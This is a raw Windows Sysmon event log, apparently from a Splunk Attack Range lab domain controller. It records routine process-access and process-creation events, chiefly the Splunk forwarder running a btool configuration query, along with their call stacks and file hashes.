Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003741Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:36.249{59A5CD1D-8EE4-6005-BE00-00000000A301}13124660C:\Windows\system32\cmd.exe{59A5CD1D-8EE4-6005-BF00-00000000A301}4668C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003740Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:36.256{59A5CD1D-8EE4-6005-BF00-00000000A301}4668C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exebtool server list kvstore --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{59A5CD1D-8EE4-6005-BE00-00000000A301}1312C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c btool server list kvstore --no-log 10341000x80000000000000003739Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:36.249{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-8EE4-6005-BE00-00000000A301}1312C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003738Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:36.249{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003737Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:36.249{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003736Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:36.249{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003735Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:36.249{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003734Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:36.249{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003733Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:36.249{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003732Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:36.249{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003731Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:36.249{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003730Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:36.249{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003729Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:36.249{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-8EE4-6005-BE00-00000000A301}1312C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003728Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:36.249{59A5CD1D-8EE3-6005-B700-00000000A301}6641004C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{59A5CD1D-8EE4-6005-BE00-00000000A301}1312C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+43bc6|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+6665|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+14ab4|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+d1d8|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003727Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:36.251{59A5CD1D-8EE4-6005-BE00-00000000A301}1312C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c btool server list kvstore --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{59A5CD1D-8EE3-6005-B700-00000000A301}664C:\Program 
Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal_extra_splunkd_service_args 10341000x80000000000000003726Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:36.217{59A5CD1D-8EE3-6005-BD00-00000000A301}45244504C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003903Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:37.983{59A5CD1D-8EE5-6005-CA00-00000000A301}24924300C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003902Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:37.749{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-8EE5-6005-CA00-00000000A301}2492C:\Program 
Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003901Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:37.749{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003900Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:37.749{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003899Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:37.749{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003898Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:37.749{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003897Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:37.749{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003896Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:37.749{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003895Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:37.749{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003894Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:37.749{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003893Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:37.749{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8EE5-6005-CA00-00000000A301}2492C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003892Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
